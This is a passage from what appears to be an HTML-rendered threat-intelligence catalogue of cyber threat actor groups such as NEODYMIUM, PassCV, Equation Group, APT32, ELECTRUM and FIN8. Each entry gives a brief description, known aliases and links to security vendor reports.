<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/">https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.virusbulletin.com/conference/vb2016/abstracts/last-minute-paper-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users">https://www.virusbulletin.com/conference/vb2016/abstracts/last-minute-paper-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_neodymium_2"><a class="anchor" href="#_neodymium_2"></a><a class="link" href="#_neodymium_2">NEODYMIUM</a></h3>
<div class="paragraph">
<p>NEODYMIUM is an activity group that is known to use a backdoor malware detected by Microsoft as Wingbird. This backdoors characteristics closely match FinFisher, a government-grade commercial surveillance package. Data about Wingbird activity indicate that it is typically used to attack individual computers instead of networks.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2453. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/">https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_packrat"><a class="anchor" href="#_packrat"></a><a class="link" href="#_packrat">Packrat</a></h3>
<div class="paragraph">
<p>A threat group that has been active for at least seven years has used malware, phishing and disinformation tactics to target activists, journalists, politicians and public figures in various Latin American countries. The threat actor, dubbed Packrat based on its preference for remote access Trojans (RATs) and because it has used the same infrastructure for several years, has been analyzed by Citizen Lab researchers John Scott-Railton, Morgan Marquis-Boire, and Claudio Guarnieri, and Cyphort researcher Marion Marschalek, best known for her extensive analysis of state-sponsored threats.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2454. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://citizenlab.org/2015/12/packrat-report/">https://citizenlab.org/2015/12/packrat-report/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cadelle"><a class="anchor" href="#_cadelle"></a><a class="link" href="#_cadelle">Cadelle</a></h3>
<div class="paragraph">
<p>Symantec telemetry identified Cadelle and Chafer activity dating from as far back as July 2014, however, its likely that activity began well before this date. Command-and-control (C&amp;C) registrant information points to activity possibly as early as 2011, while executable compilation times suggest early 2012. Their attacks continue to the present day. Symantec estimates that each team is made up of between 5 and 10 people.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2455. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets">https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_chafer"><a class="anchor" href="#_chafer"></a><a class="link" href="#_chafer">Chafer</a></h3>
<div class="paragraph">
<p>Symantec telemetry identified Cadelle and Chafer activity dating from as far back as July 2014, however, its likely that activity began well before this date. Command-and-control (C&amp;C) registrant information points to activity possibly as early as 2011, while executable compilation times suggest early 2012. Their attacks continue to the present day. Symantec estimates that each team is made up of between 5 and 10 people.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2456. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets">https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_passcv"><a class="anchor" href="#_passcv"></a><a class="link" href="#_passcv">PassCV</a></h3>
<div class="paragraph">
<p>The PassCV group continues to be one of the most successful and active threat groups that leverage a wide array of stolen Authenticode-signing certificates. Snorre Fagerland of Blue Coat Systems first coined the term PassCV in a blog post. His post provides a good introduction to the group and covers some of the older infrastructure, stolen code-signing certificate reuse, and other connections associated with the PassCV malware. There are several clues alluding to the possibility that multiple groups may be utilizing the same stolen signing certificates, but at this time SPEAR believes the current attacks are more likely being perpetrated by a single group employing multiple publicly available Remote Administration Tools (RATs). The PassCV group has been operating with continued success and has already started to expand their malware repertoire into different off-the-shelf RATs and custom code. SPEAR identified eighteen previously undisclosed stolen Authenticode certificates. These certificates were originally issued to companies and individuals scattered across China, Taiwan, Korea, Europe, the United States and Russia. In this post we expand the usage of the term PassCV to encompass the malware mentioned in the Blue Coat Systems report, as well as the APT group behind the larger C2 infrastructure and stolen Authenticode certificates. Wed like to share some of our findings as they pertain to the stolen certificates, command and control infrastructure, and some of the newer custom RATs theyve begun development on.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2457. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies">https://blog.cylance.com/digitally-signed-malware-targeting-gaming-companies</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sath_ı_müdafaa"><a class="anchor" href="#_sath_ı_müdafaa"></a><a class="link" href="#_sath_ı_müdafaa">Sath-ı Müdafaa</a></h3>
<div class="paragraph">
<p>A Turkish hacking group, Sath-ı Müdafaa, is encouraging individuals to join its DDoS-for-Points platform that features points and prizes for carrying out distributed denial-of-service (DDoS) attacks against a list of predetermined targets. Their DDoS tool also contains a backdoor to hack the hackers. So the overarching motivation and allegiance of the group is not entirely clear.</p>
</div>
</div>
<div class="sect2">
<h3 id="_aslan_neferler_tim"><a class="anchor" href="#_aslan_neferler_tim"></a><a class="link" href="#_aslan_neferler_tim">Aslan Neferler Tim</a></h3>
<div class="paragraph">
<p>Turkish nationalist hacktivist group that has been active for roughly one year. According to Domaintools, the groups site has been registered since December 2015, with an active Twitter account since January 2016. The group carries out distributed denial-of-service (DDoS) attacks and defacements against the sites of news organizations and governments perceived to be critical of Turkeys policies or leadership, and purports to act in defense of Islam</p>
</div>
<div class="paragraph">
<p>Aslan Neferler Tim is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Lion Soldiers Team</p>
</li>
<li>
<p>Phantom Turk</p>
</li>
</ul>
</div>
</div>
<div class="sect2">
<h3 id="_ayyıldız_tim"><a class="anchor" href="#_ayyıldız_tim"></a><a class="link" href="#_ayyıldız_tim">Ayyıldız Tim</a></h3>
<div class="paragraph">
<p>Ayyıldız (Crescent and Star) Tim is a nationalist hacking group founded in 2002. It performs defacements and DDoS attacks against the websites of governments that it considers to be repressing Muslim minorities or engaged in Islamophobic policies.</p>
</div>
<div class="paragraph">
<p>Ayyıldız Tim is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Crescent and Star</p>
</li>
</ul>
</div>
</div>
<div class="sect2">
<h3 id="_turkhackteam"><a class="anchor" href="#_turkhackteam"></a><a class="link" href="#_turkhackteam">TurkHackTeam</a></h3>
<div class="paragraph">
<p>Founded in 2004, Turkhackteam is one of Turkeys oldest and most high-profile hacking collectives. According to a list compiled on Turkhackteams forum, the group has carried out almost 30 highly publicized hacking campaigns targeting foreign government and commercial websites, including websites of international corporations.</p>
</div>
<div class="paragraph">
<p>TurkHackTeam is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Turk Hack Team</p>
</li>
</ul>
</div>
</div>
<div class="sect2">
<h3 id="_equation_group"><a class="anchor" href="#_equation_group"></a><a class="link" href="#_equation_group">Equation Group</a></h3>
<div class="paragraph">
<p>The Equation Group is a highly sophisticated threat actor described by its discoverers at Kaspersky Labs as one of the most sophisticated cyber attack groups in the world, operating alongside but always from a position of superiority with the creators of Stuxnet and Flame</p>
</div>
<div class="paragraph">
<p>Equation Group is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Tilded Team</p>
</li>
<li>
<p>Lamberts</p>
</li>
<li>
<p>EQGRP</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2458. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Equation_Group">https://en.wikipedia.org/wiki/Equation_Group</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_greenbug"><a class="anchor" href="#_greenbug"></a><a class="link" href="#_greenbug">Greenbug</a></h3>
<div class="paragraph">
<p>Greenbug was discovered targeting a range of organizations in the Middle East including companies in the aviation, energy, government, investment, and education sectors.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2459. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon">https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/">https://researchcenter.paloaltonetworks.com/2017/07/unit42-oilrig-uses-ismdoor-variant-possibly-linked-greenbug-threat-group/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gamaredon_group_2"><a class="anchor" href="#_gamaredon_group_2"></a><a class="link" href="#_gamaredon_group_2">Gamaredon Group</a></h3>
<div class="paragraph">
<p>Unit 42 threat researchers have recently observed a threat group distributing new, custom developed malware. We have labelled this threat group the Gamaredon Group and our research shows that the Gamaredon Group has been active since at least 2013. In the past, the Gamaredon Group has relied heavily on off-the-shelf tools. Our new research shows the Gamaredon Group have made a shift to custom-developed malware. We believe this shift indicates the Gamaredon Group have improved their technical capabilities.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2460. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution">http://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hammer_panda"><a class="anchor" href="#_hammer_panda"></a><a class="link" href="#_hammer_panda">Hammer Panda</a></h3>
<div class="paragraph">
<p>Hammer Panda is a group of suspected Chinese origin targeting organisations in Russia.</p>
</div>
<div class="paragraph">
<p>Hammer Panda is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Zhenbao</p>
</li>
<li>
<p>TEMP.Zhenbao</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2461. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.darkreading.com/endpoint/chinese-cyberspies-pivot-to-russia-in-wake-of-obama-xi-pact/d/d-id/1324242">http://www.darkreading.com/endpoint/chinese-cyberspies-pivot-to-russia-in-wake-of-obama-xi-pact/d/d-id/1324242</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_infy"><a class="anchor" href="#_infy"></a><a class="link" href="#_infy">Infy</a></h3>
<div class="paragraph">
<p>Infy is a group of suspected Iranian origin.</p>
</div>
<div class="paragraph">
<p>Infy is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Operation Mermaid</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2462. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.blackhat.com/docs/us-16/materials/us-16-Guarnieri-Iran-And-The-Soft-War-For-Internet-Dominance-wp.pdf">https://www.blackhat.com/docs/us-16/materials/us-16-Guarnieri-Iran-And-The-Soft-War-For-Internet-Dominance-wp.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://iranthreats.github.io/">https://iranthreats.github.io/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/">http://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/">https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sima"><a class="anchor" href="#_sima"></a><a class="link" href="#_sima">Sima</a></h3>
<div class="paragraph">
<p>Sima is a group of suspected Iranian origin targeting Iranians in diaspora.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2463. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.blackhat.com/docs/us-16/materials/us-16-Guarnieri-Iran-And-The-Soft-War-For-Internet-Dominance-wp.pdf">https://www.blackhat.com/docs/us-16/materials/us-16-Guarnieri-Iran-And-The-Soft-War-For-Internet-Dominance-wp.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://iranthreats.github.io/">https://iranthreats.github.io/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_blue_termite"><a class="anchor" href="#_blue_termite"></a><a class="link" href="#_blue_termite">Blue Termite</a></h3>
<div class="paragraph">
<p>Blue Termite is a group of suspected Chinese origin active in Japan.</p>
</div>
<div class="paragraph">
<p>Blue Termite is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Cloudy Omega</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2464. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/">https://securelist.com/blog/research/71876/new-activity-of-the-blue-termite-apt/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.kaspersky.com/about/news/virus/2015/Blue-Termite-A-Sophisticated-Cyber-Espionage-Campaign-is-After-High-Profile-Japanese-Targets">http://www.kaspersky.com/about/news/virus/2015/Blue-Termite-A-Sophisticated-Cyber-Espionage-Campaign-is-After-High-Profile-Japanese-Targets</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_groundbait"><a class="anchor" href="#_groundbait"></a><a class="link" href="#_groundbait">Groundbait</a></h3>
<div class="paragraph">
<p>Groundbait is a group targeting anti-government separatists in the self-declared Donetsk and Luhansk Peoples Republics.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2465. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.welivesecurity.com/2016/05/18/groundbait">http://www.welivesecurity.com/2016/05/18/groundbait</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_longhorn"><a class="anchor" href="#_longhorn"></a><a class="link" href="#_longhorn">Longhorn</a></h3>
<div class="paragraph">
<p>Longhorn has been active since at least 2011. It has used a range of back door Trojans in addition to zero-day vulnerabilities to compromise its targets. Longhorn has infiltrated governments and internationally operating organizations, in addition to targets in the financial, telecoms, energy, aerospace, information technology, education, and natural resources sectors. All of the organizations targeted would be of interest to a nation-state attacker. Longhorn has infected 40 targets in at least 16 countries across the Middle East, Europe, Asia, and Africa. On one occasion a computer in the United States was compromised but, following infection, an uninstaller was launched within hours, which may indicate this victim was infected unintentionally.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2466. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7">https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/longhorn-cyber-espionage-group-is-actually-the-cia/">https://www.bleepingcomputer.com/news/security/longhorn-cyber-espionage-group-is-actually-the-cia/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_callisto"><a class="anchor" href="#_callisto"></a><a class="link" href="#_callisto">Callisto</a></h3>
<div class="paragraph">
<p>The Callisto Group is an advanced threat actor whose known targets include military personnel, government officials, think tanks, and journalists in Europe and the South Caucasus. Their primary interest appears to be gathering intelligence related to foreign and security policy in the Eastern Europe and South Caucasus regions.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2467. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/documents/996508/1030745/callisto-group">https://www.f-secure.com/documents/996508/1030745/callisto-group</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt32_2"><a class="anchor" href="#_apt32_2"></a><a class="link" href="#_apt32_2">APT32</a></h3>
<div class="paragraph">
<p>Cyber espionage actors, now designated by FireEye as APT32 (OceanLotus Group), are carrying out intrusions into private sector companies across multiple industries and have also targeted foreign governments, dissidents, and journalists. FireEye assesses that APT32 leverages a unique suite of fully-featured malware, in conjunction with commercially-available tools, to conduct targeted operations that are aligned with Vietnamese state interests.</p>
</div>
<div class="paragraph">
<p>APT32 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>OceanLotus Group</p>
</li>
<li>
<p>Ocean Lotus</p>
</li>
<li>
<p>Cobalt Kitty</p>
</li>
<li>
<p>APT-C-00</p>
</li>
<li>
<p>SeaLotus</p>
</li>
<li>
<p>APT-32</p>
</li>
<li>
<p>APT 32</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2468. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html">https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cybereason.com/labs-operation-cobalt-kitty-a-large-scale-apt-in-asia-carried-out-by-the-oceanlotus-group/">https://www.cybereason.com/labs-operation-cobalt-kitty-a-large-scale-apt-in-asia-carried-out-by-the-oceanlotus-group/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.scmagazineuk.com/ocean-lotus-groupapt-32-identified-as-vietnamese-apt-group/article/663565/">https://www.scmagazineuk.com/ocean-lotus-groupapt-32-identified-as-vietnamese-apt-group/article/663565/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.brighttalk.com/webcast/10703/261205">https://www.brighttalk.com/webcast/10703/261205</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/eset/malware-research/tree/master/oceanlotus">https://github.com/eset/malware-research/tree/master/oceanlotus</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_silverterrier"><a class="anchor" href="#_silverterrier"></a><a class="link" href="#_silverterrier">SilverTerrier</a></h3>
<div class="paragraph">
<p>As these tools rise and fall in popularity (and more importantly, as detection rates by antivirus vendors improve), SilverTerrier actors have consistently adopted new malware families and shifted to the latest packing tools available.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2469. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/silverterrier-next-evolution-in-nigerian-cybercrime.pdf">https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/silverterrier-next-evolution-in-nigerian-cybercrime.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_wildneutron"><a class="anchor" href="#_wildneutron"></a><a class="link" href="#_wildneutron">WildNeutron</a></h3>
<div class="paragraph">
<p>A corporate espionage group has compromised a string of major corporations over the past three years in order to steal confidential information and intellectual property. The gang, which Symantec calls Butterfly, is not-state sponsored, rather financially motivated. It has attacked multi-billion dollar companies operating in the internet, IT software, pharmaceutical, and commodities sectors. Twitter, Facebook, Apple, and Microsoft are among the companies who have publicly acknowledged attacks.</p>
</div>
<div class="paragraph">
<p>WildNeutron is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Butterfly</p>
</li>
<li>
<p>Morpho</p>
</li>
<li>
<p>Sphinx Moth</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2470. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/connect/blogs/butterfly-profiting-high-level-corporate-attacks">https://www.symantec.com/connect/blogs/butterfly-profiting-high-level-corporate-attacks</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/">https://securelist.com/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://research.kudelskisecurity.com/2015/11/05/sphinx-moth-expanding-our-knowledge-of-the-wild-neutron-morpho-apt/">https://research.kudelskisecurity.com/2015/11/05/sphinx-moth-expanding-our-knowledge-of-the-wild-neutron-morpho-apt/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_platinum_2"><a class="anchor" href="#_platinum_2"></a><a class="link" href="#_platinum_2">PLATINUM</a></h3>
<div class="paragraph">
<p>PLATINUM has been targeting its victims since at least as early as 2009, and may have been active for several years prior. Its activities are distinctly different not only from those typically seen in untargeted attacks, but from many targeted attacks as well. A large share of targeted attacks can be characterized as opportunistic: the activity group changes its target profiles and attack geographies based on geopolitical seasons, and may attack institutions all over the world. Like many such groups, PLATINUM seeks to steal sensitive intellectual property related to government interests, but its range of preferred targets is consistently limited to specific governmental organizations, defense institutes, intelligence agencies, diplomatic institutions, and telecommunication providers in South and Southeast Asia. The groups persistent use of spear phishing tactics (phishing attempts aimed at specific individuals) and access to previously undiscovered zero-day exploits have made it a highly resilient threat.</p>
</div>
<div class="paragraph">
<p>PLATINUM is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>TwoForOne</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2471. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf">http://download.microsoft.com/download/2/2/5/225BFE3E-E1DE-4F5B-A77B-71200928D209/Platinum%20feature%20article%20-%20Targeted%20attacks%20in%20South%20and%20Southeast%20Asia%20April%202016.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.technet.microsoft.com/mmpc/2016/04/26/digging-deep-for-platinum/">https://blogs.technet.microsoft.com/mmpc/2016/04/26/digging-deep-for-platinum/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_electrum"><a class="anchor" href="#_electrum"></a><a class="link" href="#_electrum">ELECTRUM</a></h3>
<div class="paragraph">
<p>Dragos, Inc. tracks the adversary group behind CRASHOVERRIDE as ELECTRUM and assesses with high confidence through confidential sources that ELECTRUM has direct ties to the Sandworm team. Our intelligence ICS WorldView customers have received a comprehensive report and this industry report will not get into sensitive technical details but instead focus on information needed for defense and impact awareness.</p>
</div>
<div class="paragraph">
<p>ELECTRUM is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Sandworm</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2472. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://dragos.com/blog/crashoverride/CrashOverride-01.pdf">https://dragos.com/blog/crashoverride/CrashOverride-01.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf">https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fin8"><a class="anchor" href="#_fin8"></a><a class="link" href="#_fin8">FIN8</a></h3>
<div class="paragraph">
<p>FIN8 is a financially motivated group targeting the retail, hospitality and entertainment industries. The actor had previously conducted several tailored spearphishing campaigns using the downloader PUNCHBUGGY and POS malware PUNCHTRACK.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2473. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html">https://www.fireeye.com/blog/threat-research/2016/05/windows-zero-day-payment-cards.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html">https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.root9b.com/sites/default/files/whitepapers/PoS%20Malware%20ShellTea%20PoSlurp.pdf">https://www.root9b.com/sites/default/files/whitepapers/PoS%20Malware%20ShellTea%20PoSlurp.pdf</a></p></td>
</tr>
<tr>
